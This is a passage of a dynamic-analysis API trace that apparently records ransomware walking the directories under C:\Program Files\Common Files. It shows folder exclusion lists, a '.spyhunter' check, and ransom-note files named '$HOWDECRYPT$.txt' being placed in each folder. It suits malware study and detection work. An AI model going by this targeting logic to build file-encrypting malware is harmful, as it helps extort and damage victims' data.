Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0091.683] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0091.683] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0091.683] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\$HOWDECRYPT$.txt") returned 86 [0091.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\$HOWDECRYPT$.txt") returned 86 [0091.683] GetProcessHeap () returned 0x2c0000 [0091.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x355790 [0091.683] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0091.683] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.683] lstrcmpiW (lpString1="MSTTSCommon.dll", lpString2="Windows") returned -1 [0091.683] lstrlenW (lpString="Windows") returned 7 [0091.683] lstrcmpiW (lpString1="MSTTSCommon.dll", lpString2="$Recycle.bin") returned 1 [0091.683] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.683] lstrcmpiW (lpString1="MSTTSCommon.dll", lpString2="System Volume Information") returned -1 [0091.683] lstrlenW (lpString="System Volume Information") returned 25 [0091.683] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned 79 [0091.683] StrStrIW (lpFirst="MSTTSCommon.dll", lpSrch=".spyhunter") returned 0x0 [0091.684] lstrcmpW (lpString1="MSTTSCommon.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.684] lstrcmpW (lpString1="MSTTSCommon.dll", lpString2="_uninstalling_.png") returned 1 [0091.684] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned 79 [0091.684] GetProcessHeap () returned 0x2c0000 [0091.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3781c0 [0091.684] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0091.684] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.684] lstrcmpiW (lpString1="MSTTSEngine.dll", lpString2="Windows") returned -1 [0091.684] lstrlenW (lpString="Windows") returned 7 [0091.684] lstrcmpiW (lpString1="MSTTSEngine.dll", lpString2="$Recycle.bin") returned 1 [0091.684] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.684] lstrcmpiW (lpString1="MSTTSEngine.dll", lpString2="System Volume Information") returned -1 [0091.684] lstrlenW (lpString="System Volume Information") returned 25 [0091.684] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned 79 [0091.684] StrStrIW (lpFirst="MSTTSEngine.dll", lpSrch=".spyhunter") returned 0x0 [0091.684] lstrcmpW (lpString1="MSTTSEngine.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.684] lstrcmpW (lpString1="MSTTSEngine.dll", lpString2="_uninstalling_.png") returned 1 [0091.684] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned 79 [0091.684] GetProcessHeap () returned 0x2c0000 [0091.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3782a8 [0091.684] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0091.684] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.684] lstrcmpiW (lpString1="MSTTSLoc.dll", lpString2="Windows") returned -1 [0091.684] lstrlenW (lpString="Windows") returned 7 [0091.684] lstrcmpiW (lpString1="MSTTSLoc.dll", lpString2="$Recycle.bin") returned 1 [0091.684] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.685] lstrcmpiW (lpString1="MSTTSLoc.dll", lpString2="System Volume Information") returned -1 [0091.685] lstrlenW (lpString="System Volume Information") returned 25 [0091.685] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned 76 [0091.685] StrStrIW (lpFirst="MSTTSLoc.dll", lpSrch=".spyhunter") returned 0x0 [0091.685] lstrcmpW (lpString1="MSTTSLoc.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.685] lstrcmpW (lpString1="MSTTSLoc.dll", lpString2="_uninstalling_.png") returned 1 [0091.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned 76 [0091.685] GetProcessHeap () returned 0x2c0000 [0091.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x378390 [0091.685] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0091.685] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.685] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.685] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\$HOWDECRYPT$.txt") returned 80 [0091.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\$HOWDECRYPT$.txt") returned 80 [0091.685] GetProcessHeap () returned 0x2c0000 [0091.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f508 [0091.685] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0091.687] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.687] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.687] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\$HOWDECRYPT$.txt") returned 74 [0091.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\$HOWDECRYPT$.txt") returned 74 [0091.687] GetProcessHeap () returned 0x2c0000 [0091.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346d48 [0091.687] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0091.687] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0091.687] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0091.687] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\$HOWDECRYPT$.txt") returned 64 [0091.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\$HOWDECRYPT$.txt") returned 64 [0091.687] GetProcessHeap () returned 0x2c0000 [0091.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x3582d0 [0091.687] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0091.688] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0091.688] lstrcmpiW (lpString1="System", lpString2="Windows") returned -1 [0091.688] lstrlenW (lpString="Windows") returned 7 [0091.688] lstrcmpiW (lpString1="System", lpString2="$Recycle.bin") returned 1 [0091.688] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.688] lstrcmpiW (lpString1="System", lpString2="System Volume Information") returned -1 [0091.688] lstrlenW (lpString="System Volume Information") returned 25 [0091.688] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System") returned 40 [0091.688] lstrcmpW (lpString1="System", lpString2=".") returned 1 [0091.688] lstrcmpW (lpString1="System", lpString2="..") returned 1 [0091.688] GetProcessHeap () returned 0x2c0000 [0091.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.689] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\*") returned 42 [0091.689] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0091.691] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.691] lstrlenW (lpString="Windows") returned 7 [0091.691] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.691] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.692] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.692] lstrlenW (lpString="System Volume Information") returned 25 [0091.692] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\.") returned 42 [0091.692] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.692] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.692] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.692] lstrlenW (lpString="Windows") returned 7 [0091.692] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.692] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.692] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.692] lstrlenW (lpString="System Volume Information") returned 25 [0091.692] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\..") returned 43 [0091.692] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.692] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.692] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.692] lstrcmpiW (lpString1="ado", lpString2="Windows") returned -1 [0091.692] lstrlenW (lpString="Windows") returned 7 [0091.692] lstrcmpiW (lpString1="ado", lpString2="$Recycle.bin") returned 1 [0091.692] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.692] lstrcmpiW (lpString1="ado", lpString2="System Volume Information") returned -1 [0091.692] lstrlenW (lpString="System Volume Information") returned 25 [0091.692] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 44 [0091.692] lstrcmpW (lpString1="ado", lpString2=".") returned 1 [0091.692] lstrcmpW (lpString1="ado", lpString2="..") returned 1 [0091.693] GetProcessHeap () returned 0x2c0000 [0091.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0091.693] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*") returned 46 [0091.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.695] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.695] lstrlenW (lpString="Windows") returned 7 [0091.695] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.695] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.695] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.712] lstrlenW (lpString="System Volume Information") returned 25 [0091.712] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.") returned 46 [0091.712] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.712] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.713] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.713] lstrlenW (lpString="Windows") returned 7 [0091.713] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.713] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.713] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.713] lstrlenW (lpString="System Volume Information") returned 25 [0091.713] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\..") returned 47 [0091.713] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.713] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.713] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.713] lstrcmpiW (lpString1="adojavas.inc", lpString2="Windows") returned -1 [0091.713] lstrlenW (lpString="Windows") returned 7 [0091.713] lstrcmpiW (lpString1="adojavas.inc", lpString2="$Recycle.bin") returned 1 [0091.713] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.713] lstrcmpiW (lpString1="adojavas.inc", lpString2="System Volume Information") returned -1 [0091.713] lstrlenW (lpString="System Volume Information") returned 25 [0091.713] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 57 [0091.713] StrStrIW (lpFirst="adojavas.inc", lpSrch=".spyhunter") returned 0x0 [0091.713] lstrcmpW (lpString1="adojavas.inc", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.713] lstrcmpW (lpString1="adojavas.inc", lpString2="_uninstalling_.png") returned 1 [0091.713] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 57 [0091.713] GetProcessHeap () returned 0x2c0000 [0091.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34c998 [0091.713] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0091.714] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.714] lstrcmpiW (lpString1="adovbs.inc", lpString2="Windows") returned -1 [0091.714] lstrlenW (lpString="Windows") returned 7 [0091.714] lstrcmpiW (lpString1="adovbs.inc", lpString2="$Recycle.bin") returned 1 [0091.714] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.714] lstrcmpiW (lpString1="adovbs.inc", lpString2="System Volume Information") returned -1 [0091.714] lstrlenW (lpString="System Volume Information") returned 25 [0091.714] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 55 [0091.714] StrStrIW (lpFirst="adovbs.inc", lpSrch=".spyhunter") returned 0x0 [0091.714] lstrcmpW (lpString1="adovbs.inc", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.714] lstrcmpW (lpString1="adovbs.inc", lpString2="_uninstalling_.png") returned 1 [0091.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 55 [0091.714] GetProcessHeap () returned 0x2c0000 [0091.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x329f48 [0091.714] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0091.714] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.714] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0091.714] lstrlenW (lpString="Windows") returned 7 [0091.714] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0091.714] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.714] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0091.714] lstrlenW (lpString="System Volume Information") returned 25 [0091.714] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 50 [0091.714] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0091.715] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0091.715] GetProcessHeap () returned 0x2c0000 [0091.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.715] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*") returned 52 [0091.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.716] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.716] lstrlenW (lpString="Windows") returned 7 [0091.716] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.716] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.716] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.716] lstrlenW (lpString="System Volume Information") returned 25 [0091.716] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\.") returned 52 [0091.716] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.716] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.716] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.716] lstrlenW (lpString="Windows") returned 7 [0091.716] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.716] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.716] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.716] lstrlenW (lpString="System Volume Information") returned 25 [0091.716] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\..") returned 53 [0091.716] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.716] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.716] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.716] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="Windows") returned -1 [0091.716] lstrlenW (lpString="Windows") returned 7 [0091.716] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.716] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.716] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="System Volume Information") returned -1 [0091.716] lstrlenW (lpString="System Volume Information") returned 25 [0091.717] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 67 [0091.717] StrStrIW (lpFirst="msader15.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.717] lstrcmpW (lpString1="msader15.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.717] lstrcmpW (lpString1="msader15.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 67 [0091.717] GetProcessHeap () returned 0x2c0000 [0091.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358610 [0091.717] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1630) returned 0x2c310e0 [0091.717] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.717] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.717] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\$HOWDECRYPT$.txt") returned 67 [0091.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\$HOWDECRYPT$.txt") returned 67 [0091.717] GetProcessHeap () returned 0x2c0000 [0091.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358d60 [0091.717] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1638) returned 0x2c310e0 [0091.717] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.717] lstrcmpiW (lpString1="msader15.dll", lpString2="Windows") returned -1 [0091.717] lstrlenW (lpString="Windows") returned 7 [0091.717] lstrcmpiW (lpString1="msader15.dll", lpString2="$Recycle.bin") returned 1 [0091.717] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.718] lstrcmpiW (lpString1="msader15.dll", lpString2="System Volume Information") returned -1 [0091.718] lstrlenW (lpString="System Volume Information") returned 25 [0091.718] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 57 [0091.718] StrStrIW (lpFirst="msader15.dll", lpSrch=".spyhunter") returned 0x0 [0091.718] lstrcmpW (lpString1="msader15.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.718] lstrcmpW (lpString1="msader15.dll", lpString2="_uninstalling_.png") returned 1 [0091.718] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 57 [0091.718] GetProcessHeap () returned 0x2c0000 [0091.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34ca58 [0091.718] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1640) returned 0x2c310e0 [0091.718] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.718] lstrcmpiW (lpString1="msado15.dll", lpString2="Windows") returned -1 [0091.718] lstrlenW (lpString="Windows") returned 7 [0091.718] lstrcmpiW (lpString1="msado15.dll", lpString2="$Recycle.bin") returned 1 [0091.718] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.718] lstrcmpiW (lpString1="msado15.dll", lpString2="System Volume Information") returned -1 [0091.718] lstrlenW (lpString="System Volume Information") returned 25 [0091.719] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 56 [0091.719] StrStrIW (lpFirst="msado15.dll", lpSrch=".spyhunter") returned 0x0 [0091.719] lstrcmpW (lpString1="msado15.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.719] lstrcmpW (lpString1="msado15.dll", lpString2="_uninstalling_.png") returned 1 [0091.719] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 56 [0091.719] GetProcessHeap () returned 0x2c0000 [0091.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34cb18 [0091.719] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1648) returned 0x2c310e0 [0091.719] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.719] lstrcmpiW (lpString1="msado20.tlb", lpString2="Windows") returned -1 [0091.719] lstrlenW (lpString="Windows") returned 7 [0091.719] lstrcmpiW (lpString1="msado20.tlb", lpString2="$Recycle.bin") returned 1 [0091.719] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.719] lstrcmpiW (lpString1="msado20.tlb", lpString2="System Volume Information") returned -1 [0091.719] lstrlenW (lpString="System Volume Information") returned 25 [0091.719] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 56 [0091.719] StrStrIW (lpFirst="msado20.tlb", lpSrch=".spyhunter") returned 0x0 [0091.719] lstrcmpW (lpString1="msado20.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.719] lstrcmpW (lpString1="msado20.tlb", lpString2="_uninstalling_.png") returned 1 [0091.719] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 56 [0091.719] GetProcessHeap () returned 0x2c0000 [0091.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34cbd8 [0091.719] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1650) returned 0x2c310e0 [0091.719] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.719] lstrcmpiW (lpString1="msado21.tlb", lpString2="Windows") returned -1 [0091.720] lstrlenW (lpString="Windows") returned 7 [0091.720] lstrcmpiW (lpString1="msado21.tlb", lpString2="$Recycle.bin") returned 1 [0091.720] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.720] lstrcmpiW (lpString1="msado21.tlb", lpString2="System Volume Information") returned -1 [0091.720] lstrlenW (lpString="System Volume Information") returned 25 [0091.720] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 56 [0091.720] StrStrIW (lpFirst="msado21.tlb", lpSrch=".spyhunter") returned 0x0 [0091.720] lstrcmpW (lpString1="msado21.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.720] lstrcmpW (lpString1="msado21.tlb", lpString2="_uninstalling_.png") returned 1 [0091.720] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 56 [0091.720] GetProcessHeap () returned 0x2c0000 [0091.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34cc98 [0091.720] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1658) returned 0x2c310e0 [0091.720] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.720] lstrcmpiW (lpString1="msado25.tlb", lpString2="Windows") returned -1 [0091.720] lstrlenW (lpString="Windows") returned 7 [0091.720] lstrcmpiW (lpString1="msado25.tlb", lpString2="$Recycle.bin") returned 1 [0091.720] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.720] lstrcmpiW (lpString1="msado25.tlb", lpString2="System Volume Information") returned -1 [0091.720] lstrlenW (lpString="System Volume Information") returned 25 [0091.720] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 56 [0091.720] StrStrIW (lpFirst="msado25.tlb", lpSrch=".spyhunter") returned 0x0 [0091.720] lstrcmpW (lpString1="msado25.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.720] lstrcmpW (lpString1="msado25.tlb", lpString2="_uninstalling_.png") returned 1 [0091.720] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 56 [0091.721] GetProcessHeap () returned 0x2c0000 [0091.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34cd58 [0091.721] 